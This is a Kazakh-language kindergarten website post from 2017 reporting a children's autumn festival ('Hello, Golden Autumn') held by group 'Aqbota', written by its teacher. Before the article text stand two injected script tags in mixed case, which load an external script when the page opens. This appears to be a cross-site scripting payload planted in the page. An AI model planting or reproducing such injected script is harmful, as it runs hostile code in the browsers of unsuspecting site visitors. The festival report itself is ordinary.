<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.10.2017

                                   «Сәлем бердім, Алтын күз!»

Сұр бұлт түсі суық қаптайды аспан,

Күз болып,дымқыл тұман жерді басқан.

Білмеймін тойғаны

ма,тоңғаныма,

Жылқы ойнап, бие қашқан, тай жарысқан,- деп қазақтың ұлы

ақына Абай атамыз айтқандай табиғат жаратылысы өзіне тән жыл он екі ай төрт

мезгілімен ұштасады. Әр мезгілдің өзіне тән қасиеті болады. Сол төрт жылдың бір

мезгілі ол – Күз. Сары жапырақ қоңыр салқын ауа – райы, жабырқаулы көңіл – күй,

қара суық жер күзге тән қасиет.

    Осы мақалама арқау болып отырған № 10 «Алтын бала» бала

бақшасындағы

№ 3 «Ақбота» естиярлар тобы болатын. «Сәлем бердім, Алтын

күз» атты ертеңгілікке ата – аналарда аянбай еңбек етті. Осы мезгілге

байланысты табиғи құралдардан жасалған кіші көрме ұйымдастырылды.

  Бүлдіршіндер күз

мезгіліне,табиғатқа деген ыстық сезімдерін өлең, тақпақ арқылы танытты.

Қонаққа, Сайқымазақ, Күз ханшайымы келіп балаларды, ата – аналарды бірқуантты.

Ата–аналармен де қызықты ойын ойнатылды.

Ертеңгіліктің барысында 

қонаққа Асқабақ  келді. Асқабаққа

арнап балалар «Жемісті жинаймыз» әнін орындап берді. Ертеңгілігіміздің соңында

ата – аналар рахметтерін айтып, қуаныштарын білдіріп жатты.

Сондықтан күз – молшылықтың, байлықтың, берекенің мезгілі

болып саналады.

Жазған: Адилова А.Е.

№ 3 «Ақбота» тобының тәрбиешісі

 

Просмотров: 392


Пікір қосу



Деректерді қолтаңбаға қосу